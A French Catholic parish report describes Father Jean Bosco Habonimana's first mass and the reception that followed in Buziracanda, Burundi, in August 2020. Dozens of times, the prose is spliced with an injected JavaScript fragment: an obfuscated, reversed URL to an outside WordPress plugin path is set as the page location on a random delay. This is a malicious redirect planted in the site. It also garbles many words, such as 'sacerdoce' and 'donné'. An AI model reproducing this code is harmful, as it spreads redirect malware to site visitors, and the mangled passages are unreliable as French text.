C’était une très grande joie dans la  Paroisse Saint Jean XXIII de Buziracanda, commune Ndava  dans la province de Mwaro, ce 22 Aout 2020, le Jour dédié à la Vierge Marie Reine de l’univers, ou les Chrétiens de cette paroisse recevaient leur fils Père Jean Bosco Habonima des Peres de Schoenstatt, venu célébrer  sa messe des prémices. Sous un ciel agréablement nuageux, l’air très frais des hauteurs de cette région à cheval entre la région naturelle de Mugamba et Kirimiro, les Chrétiens de Buziracanda, y compris les hautes personnalités natives de cette paroisse, sans oublier les amis et autres Chrétiens venus de Bujumbura, Gitega et ailleurs,  ont afflué très nombreux manifester leur joie et leur reconnaissance envers Dieu pour ce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don du sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce que Jésus a fait partager au Père Habonimana.  Nous noterons pour rappel que Père Jean Bosco Habonimana a été ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné Prêtre le 18 Juillet 2020 à la Paroisse Rugazi de l’archidiocèse de Bujumbura par Son Excellence l’archevêque Gervais Banshimiyubusa. 

La messe a commencé a 10h00 par une longue procession avec a l’avant le Thuriféraires et la croix,  suivis des jeunes danseuses et les danseurs Intore. Ceux-ci étaient suivis par les membres de la Chorale  Marie Reine de la Sagesse, les  religieux et religieuses, puis les servants de messe et prêtres venus soutenir leur confrères et enfin le Père Jean Bosco Habonimana qui dirigeait cette sainte messe. C’était sous des Chants d’action de vocation et à la Vierge Marie  que la procession est entrée dans l’église paroissial, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont le décor ne faisait qu’impressionner plus d’un.  Malheureusement l’église n’a pas pu contenir le grand nombre de personnes venues pour cette célébration eucharistique.

Dans son mot d’accueil, le Curé de la paroisse Buzircanda, Abbé Thomas Niragira, a souhaité la  bienvenue à tout le monde, en commençant  par Père Jean Bosco lui-même et tous les Chrétiens natifs et amis de la paroisse et du Père Jean Bosco.  Le Curé a rappelé la devise du Père Habonimana qui dit « Je t’ai appelé par ton nom: tu es à moi » en voulant signifier que Dieu a appelé le Père Habonimana Jean Bosco par son nom, et celui-ci a dit son OUI le 18 Juillet 2020, jour de son ordination sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotale à la Paroisse Saint Paul de Rugazi. Il a enfin fait savoir que c’était une très grande joie pour les Chrétiens de Buziracanda, puisque beaucoup d’entre eux n’avaient pas pu se rendre à Rugazi. Il a aussi tenu à remercier le Père Jean Bosco d’être venu ; le jour tant attendu était enfin arrivé.

Il a profité de l’occasion pour dire particulièrement aux jeunes présents qu’un prêtre  est choisi parmi les hommes comme un signe vivant de Dieu, pour annoncer son Nom à son peuple, mais aussi pour établir un lien entre Dieu et les hommes. C’est pour cela qu’un prêtre ne fonde pas d’autre famille, pour se dédier totalement et entièrement à sa famille de Schoenstatt et toute l’Eglise. L’Abbé Thomas a terminé son mot  en interpellant Père Jean Bosco d’avoir toujours la paroisse dans son cœur et de prier toujours pour elle, la confiant toujours au Sacré Cœur de Jésus Christ, pour que  la paroisse ait d’autres jeunes qui se consacreront à Dieu.

Père Jean Bosco a brièvement remercié le Curé au nom de tout le monde présent, ceux qui étaient venus de loin mais aussi  au nom des chrétiens de Buziracanda. Il a ensuite annoncé  qu’il était venu célébrer cette Sainte Messe pour témoigner de l’amour que Dieu l’a aimé en précisant  que c’est Dieu qui nous rend capable  d’entendre sa voix et d’y répondre, guidés par son Esprit Saint.  C’est une évidence que l’eucharistie nous unit entre nous chrétiens et nous unit aussi à Dieu.  

Homélie

Dans son homélie, Père Jean Bosco a tout d’abord  annoncé qu’il était venu célébrer sa messe des prémices  le jour très important dans l’Eglise, et surtout dans sa famille de Schoenstatt, le jour où l’on célèbre la Vierge Marie Reine de l’Univers. Le Père jean Bosco a alors  parlé de l’origine de sa vocation, « Dieu m’a appelé par mon nom »;  et j’ai commencé à méditer sur cette Parole  depuis 2005 le jour où le Seigneur m’a révélé ma vocation par sa Parole. C’était pendant ma retraite au Foyer de Charité à  Giheta.   Cette Parole m’a beaucoup aidé tout au long de de mon cheminement et tout le temps que j’ai passé au noviciat . 

Quand un jour  j’étais en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doute, je me suis confié  au responsable des novices de l’époque, Père Félicien Nimbona, et miraculeusement il m’a réconforté avec la même Parole, «Je t’appelle par ton nom: tu es à moi! » Isaïe 43, 1. Il ne savait pas que c’était la parole que j’avais choisie pour le discernement de ma vocation.  Et dans ma réflexion, j’ai alors compris que le Saint Esprit était passé par son prêtre pour me rappeler  que Dieu m’avait choisi.  Alors j’ai continué dans le cheminement de ma vocation. Et dans mes études de philosophie et de théologie, j’ai continué à méditer sur ma devise, à l’étudier  dans ses racines,  à  m’enquérir, et j’ai découvert qu’elle vient du livre du prophète Isaïe, deuxième partie, quand Dieu  console son peuple Israël  qui est en exile en Babylone.   

Dieu avait choisi Israël parmi d’autres pays, lui avait toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné un nom et l’avait appelé par son nom, non pas parce qu’Israël  était le plus grand pays, le plus riche, le plus fort ou le plus vertueux.  Il y avait d’autres pays plus puissants  qu’Israël comme l’Egypte. Mais c’était le plan de Dieu que son Fils naisse en Israël et vienne de ce pays pour  sauver la race humaine. Moi aussi non plus je n’étais pas le plus puissant, mais Dieu a voulu me convier  au sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce de son Fils Jésus Christ, pour que j’annonce à son peuple la Bonne Nouvelle, et lui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne les sacrements. Priez pour moi alors sans cesse pour  que je garde cela au cœur, que je garde les mots que Dieu a dites au prophète Isaïe.  C’est vrai qu’être prêtre  est une vocation importante et délicate d’épandre le royaume de Dieu dans le monde. Mais Dieu ne nous choisit pas puisque nous sommes capables mais puisqu’Il nous rend capables. C’est Dieu Lui-même qui dit dans Isaïe 43, 2,  » Si tu traverses les eaux, je serai avec toi; Et les fleuves, ils ne te submergeront point; Si tu marches dans le feu, tu ne te brûleras pas, Et la flamme ne t’embrasera pas« . Ici l’eau, les rivières et la flamme sont tous ces embûches  que je rencontrerai dans ma mission. C’est pourquoi il faut toujours prier pour moi, pour que je me rappelle de ces mots de Dieu, que Dieu est toujours avec moi.

Le fait que ce  jour coïncide aussi à la célébration de la Vierge Marie Reine de l’univers est un grand signe pour moi, me montrant que je toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dois introniser Marie dans ma vie me basant sur l’Alliance d’Amour que j’ai scellée avec elle. Marie est aussi la Mère des prêtres et Reine des Apôtres, chaque  prêtre toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit alors la respecter et lui obéir. Le Pape François nous dit, « Un prêtre toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit se consacrer à la Vierge Marie ». Je méditais toujours sur le fait que le 18 Juillet, le jour de mon ordination à Rugazi, a coïncidé avec le jour où nous renouvelons notre alliance d’amour avec la Vierge Marie, et voilà qu’aujourd’hui aussi coïncide au jour de  la Vierge Marie. Priez alors toujours pour moi, pour que je me confie toujours à Marie notre modèle. Je veux aussi être le  » Oui » de Marie me en  obéissant à mes supérieurs dans l’Eglise et dans ma famille de Schoenstatt. Je veux toujours dire comme Marie: « Que tout me soit selon ta volonté« .   Je sais que si je me confie à Marie, elle me rendra capable.

Le Père Jean Bosco a terminé son homélie disant que   c’est Marie qui a été conçue sans péché et qui a accueilli la volonté de Dieu sans être y forcée, à cœur ouvert.  Donc la Vierge Marie est le modèle de l’Eglise, c’est Marie qui nous enseigne que chacun est appelé à  brûler d’amour pour l’eucharistie, cette nourriture qui nous fortifie dans notre marche vers le ciel.   Amen

Offertoire 

Le moment de l’offertoire a été non seulement une belle  occasion d’offrir à Dieu  le pain et vin qui deviennent le corps et le sang du Christ, mais aussi il a été un temps de présenter des offrandes en nature dans la joie du chants et de la danse.  Ainsi une longue ligne de femmes de la famille des amis de la Radio Maria Burundi de Mont Sion Gikungu et autres Chrétiennes de Mont Sion Gikungu, ont défilé devant l’autel portant des paniers. Ainsi Père Jean Bosco a saisi l’occasion pour annoncer que c’est la période du Mariathon, et que c’était une belle occasion pour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner notre contribution à la Radio Maria afin qu’elle puisse dans l’avenir émettre sur toute l’étendu du territoire national.  C’est ainsi qu’on a offert une grande image de la Vierge Marie patronne de la Radio Maria avant la fin de la messe. La messe s’est clôturée dans une très grande joie, de sorte que  pendant le chant d’action de grâce certains prêtres, surtout Père Jean Bosco et ceux ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés le même jour que lui à Rugazi, n’ont pas pu se retenir et se sont joint aux Chrétiens pour danser à Dieu avant que Père Jean Bosco ait toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné la bénédiction solennelle et finale. 

A la fin de la messe, Père Jean Bosco a eu l’occasion d’exprimer ses sentiments de joie et de remerciement tout en émettant une exhortation. Il a dit que c’était avec grande joie qu’il entendait bien exulter comme Marie en répétant comme elle, « car le Tout-Puissant a fait pour moi de grandes choses. Saint est son nom ». Il a alors rendu hommage à Dieu Créateur pour lui avoir appelé, non pas parce qu’il était le plus méritant, mais que dans sa bonté Dieu a voulu lui confier  au sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce de son Fils Jésus Christ. Il a ensuite remercié ses parents qui l’ont mis au monde et ont beaucoup pris soin de lui depuis son jeune âge, l’ont envoyé à l’école et n’ont cessé de suivre son évolution à l’école bien que ce fût à une bonne distance de marche à partir de la maison. Il leur a remercié pour la façon  toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont ils ont  accueilli sa décision de se consacrer à Dieu,  surtout qu’ils n’ont jamais été un obstacle mais qu’ils ont toujours soutenu avec joie.  

Ses sentiments de gratitudes étaient ensuite dirigés  vers ses frères et sœurs de sang, ses amis  et ses relations pour toute  contribution dans son cheminement vers le sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce.  Il n’a pas oublié de faire mention de différents enseignants qui l’ont et éduqué depuis l’école primaire, secondaire, au séminaire pour être ce qu’il est aujourd’hui. Il  a beaucoup remercié la Congrégation des Pères Schoenstatt, en particulier la communauté de Mont Sion Gikungu, qui l’a reçu a bras ouverts et l’a beaucoup aidé dans son discernement  vocationnel.  Il a aussi exprimé ses remerciements envers les membres du comité d’organisation des cérémonies du jour qui se sont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné corps et âme pour tout bien organiser. Il leur a prié de garder ce cœur même pour ceux qui viendront après lui, et a promis de les offrir à Dieu toujours dans ses prières  pour qu’ils soient toujours dans la grâce de Dieu.

Père Jean Bosco n’a pas bien sur oublié de remercier la Chorale Marie Reine de la Sagesse, dans laquelle il a lui-même chanté dans ses débuts, pour avoir bien animé la messe. Avec la chorale il  a aussi remercié  ceux qui l’avaient aidé dans les préparatifs, et les jeunes filles danseuses et les garçons danseurs  intore pour avoir bien agrémenté la messe, et leur a souhaité de grandir dans la sainteté. Il a de même exprimé sa gratitude a tous les fidèles qui étaient venus vraiment nombreux  lui témoigner leur soutien en ce jour. Beaucoup d’entre eux étaient  venus le supporter à Rugazi lors de l’ordination depuis Buziracanda ce qui montre un grand amour.  Il a terminé en remerciant les fidèles et invités venus nombreux depuis Gitega et ailleurs sans oublier les fidèles de Mont Sion Gikungu venus nombreux,  leur souhaitant bonne santé et bénédiction abondante de Dieu.  Avant la bénédiction finale, Père jean Bosco a  fait une brève présentation  de certaines personnes présentes à l’occasion. Il s’agissait en particulier des Père , notamment des Pères Alain Amani  et le Père Floribert Kaneza avec qui il a partagé son cheminement dans la Communauté des Pères de Schoenstatt jusqu’à leur ordination sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotale, de l’Abbé Yves Nkunzimana, prêtre diocésain ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné avec lui à Rugazi et  les Peres Schoenstatt présents pour les circonstances.  Il y a avait aussi d’autres prêtres, des consacrés et les autres invités venus de différents coins du pays.

Réception 

Après la messe c’était une occasion pour les invités et les fidèles natifs  de Buziracanda de s’asseoir ensemble pour partager un verre. Dans une brève allocution d’accueil, le Curé de la Paroisse Buziracanda a dit qu’on avait  médité sur  comment Dieu a aimé Père Jean Bosco et l’a appelé, sur sa sagesse et son intelligence.  Et l’a alors prié de bénir tout le monde présent  pour  qu’il ait un bon moment pendant tout e temps qu’on allait passer ensemble.  Pendant ce temps, différents discours ont été prononcés, à commencer par  le Président du comité d’organisation de ladite fête. Son discours a été suivi par ceux du Président du Conseil Paroissial, du parent du Père Jean Bosco, du représentant des invités, du Père Supérieur des de la Communauté des Pères de Schoenstatt et en fin celui bien entendu du Père Jean Bosco lui-même.  

Le Président du comité d’organisation a remercié le Père Jean Bosco pour avoir mis confiance dans les membres dudit comité afin de l’aider à organiser cette fête combien grandiose. Il a profité de l’occasion pour féliciter le Père pour le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don du sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce reçu ce 18 Juillet à Rugazi. Il lui a souhaité courage, force et assistance divines tout au long de sa mission. Leur choix par le Père Jean Bosco a fait qu’ils soient maintenant devenus de frères, surtout que bon nombre d’entre eux sont des natif de Buziracanda.  Au nom du comité, le président a également félicité les Pères Alain Amani et Floribert Kaneza qui ont été ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés en même temps avec le Père Jean Bosco. Il a dit que le comité ne voyait pas bien quoi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner comme cadeau puisque ils ont tout puisqu’ils ont Dieu, mais ils ont tout de même offert a chacun des trois la Sainte Bible, ce que le président a appelé une petite chose mais  qui inclut tout. 

Le Président du Conseil Paroissial a quant à lui déclaré que ce jour était spécial à la paroisse Buziracanda.  Et de faire sa prière,  » Que ce soit ainsi chaque année « . Il a dit que la Paroisse Buziracanda a 5 prêtres natifs jusqu’à présent, mais les 4 premiers ont été ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés quand Buziracanda était encore une succursale de la paroisse Kiganda et que ce cinquième, Père Jean Bosco est le premier depuis que Buziracanda est devenue une Paroisse, il ya trois ans. Il faut alors rendre grâce au Seigneur pour tous les biens toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont il nous  et pour les Prêtres qu’Il nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne.

Le Président du Conseil Paroissial a fait savoir que Père Jean Bosco a toujours été sage calme,  que dans le mouvement  Schoenstatt et partout ou il est passé, il a toujours été  un bon exemple de conduite pour les autres. Il a alors promis qu’ils prieront toujours pour lui pour qu’il accomplisse bien sa mission, pour que Dieu continue à accomplir le bien qu’Il a déjà commencé  en lui. Il lui demandé de prier pour la paroisse et les paroissiens partout où il ira pour sa mission.  Et comme il a toujours aimé  la famille de chrétiens de Buziracanda, il n’a pas manqué de lui faire un cadeau au nom de la paroisse.

Le Père  de Jean Bosco a remercié  tout le monde d’être venu se joindre à eux pour rendre grâce à Dieu qui leur a fait du grand bien qu’est le père.  Il les a alors prié de Garder toujours ce cœur même pour les autres personnes. Il les a exhortés à toujours Soutenir  le Père Jean Bosco  dans sa mission pour Dieu.  Il a enfin déclaré que la famille était  très contente  de ce que Dieu l’a honoré, et que leur famille avait aussi beaucoup prié pour le sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce de leur fils. Et pour manifester sa joie, il  lui a offert une  génisse dénommée Yamuco.

Celui qui a parlé au nom des invités, a dit qu’ils étaient très reconnaissants pour ‘invitation qui leur avait été toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné pour l’événement susmentionné. Ils ont voulu aussi exprimer leur gratitude à Dieu pour ce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don d’un prêtre. Il a dit qu’ils  ont  entendu que maintenant il ya 5 prêtres dans la paroisse Buziracanda,  mais qu’ils étaient aussi confiants qu’il va y en avoir d’autres puisqu’ils avaient vu  des jeunes, même des fratres a différents niveaux de leur cursus académique et spirituel. Il a dit qu’ils avaient eu l’information  de l’ordination à Rugazi, mais qu’ils  désiraient  vraiment le voir célébrer la messe parmi eux et chez eux.  Il a également promis qu’ils toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donneront ce qu’ils ont pour le bon apostolat du Père Jean Bosco. Il a enfin remercié les différents chrétiens, ceux qui avaient répondu à l’invitation de  cette fête.  

Le discours du Père Supérieur des Pères de la Communauté de la Région des Grands Lacs, Père Bernard Mazuru, a suivi celui du représentant des invités. Dans une joie manifeste,  a dit qu’il n’avait pas beaucoup de choses à dire, mais qu’à ce jour très important il  voudrait dire deux choses. Premièrement, il voudrait remercier Dieu pour leur avoir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné confrère, le  Père Jean Bosco Habonimana dans leur communauté des Pères Schoenstatt. Il a, en second lieu, promis qu’ils seront  toujours près de lui dans sa mission de sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce, que ce soit à Mont Sion Gikungu, et n’ importe où il sera envoyé accomplir sa mission. Il a dit que les Pères Schoenstatt remercient la Paroisse Buziracanda pour leur avoir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné Père Jean Bosco, et qu’ils  continueront à prier pour que la paroisse ait beaucoup d’autres prêtres. 

Parlant du, le Père Mazuru a fait savoir que le Père Jean Bosco est quelqu’un  d’une grande vivacité, qui fait des choses anticipativement. De plus, c’est quelqu’un de joyeux, qui aime sourire,  ce qui est une bonne caractéristique d’un prêtre. « Père Jean Bosco, tu nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne la joie qui vient de l’amour de Dieu, et nous, tes confrères, t’aideront et tout ira bien », a déclaré le Père Mazuru. Il a alors saisi de l’occasion pour annoncer que Père Jean Bosco, ne restera là-bas très longtemps puisqu’il sera dans l’équipe qui va bientôt aller commencer une nouvelle communauté des Peres Schoenstatt en République  Démocratique du Congo.

Le discours du Père Jean Bosco Habonimana

Le Père Jean  Bosco Habonimana, a alors pris un petit moment pour exprimer ses remerciements  encore une fois mais aussi réagir aux différents discours déjà prononcés. « J’ai une très grande joie, comme je l’ai déjà dit  pendant la messe. Ce jour était  tant attendu, avec un très grand engouement pour moi,  depuis toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douze ans de cheminement dans la communauté des Pères de Schoenstatt. Je sais très bien que beaucoup d’entre vous ont prié pour moi,  et Dieu a exaucé votre prière. Beaucoup d’entre vous m’ont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné des conseils que j’ai très bien gardés à cœur . Bien d’autres m’ont aidé matériellement depuis l’école primaire à nos jours et je vous suis très reconnaissant. Que Dieu continue à vous bénir abondamment. » Il a remercié Il a remercié ceux qui avait offert divers cadeaux, en commençant bien sûr par celui de sa famille puisque son cadeau  dénote la mission du sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doce et témoigne toujours de son soutien.  Il n’a pas manquer de mentionner ceux qui avaient organisé et préparé cette place et toutes les cérémonies et festivités. Ses remerciements étaient aussi dirigés vers les invités venus de Bujumbura, Gitega et ailleurs tout en leur souhaitant bon retour chez eux dans paix et la bénédiction divines.

 C’est dans cette ambiance de fête, de joie et de remerciements que la fête pour la messe des prémices de Père jean Bosco, s’est clôturée près  de 15h 30.   Et d’aucuns n’ont pas pu contenir leur joie et ont entonné des chants et ont commencé à danser.  C’était très agréable de voir Père Jean Bosco au milieu de ses parents et frères  et sœurs, ses confrères Pères de Schoenstatt, et beaucoup d’autres chrétiens chanter et danser,  au milieu de la poésie laudatif pour Dieu, pour rendre grâce à Dieu pour  sa bonté.C’est dans cette ambiance que finalement  Père Jean Bosco Habonimana, ayant invoqué la protection de Dieu avec la prière de Saint Jean XXIII, le Patron de la Paroisse Buziracanda, a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné la bénédiction finale clôturant ainsi les festivités du jour.

Fulgence Ndayizeye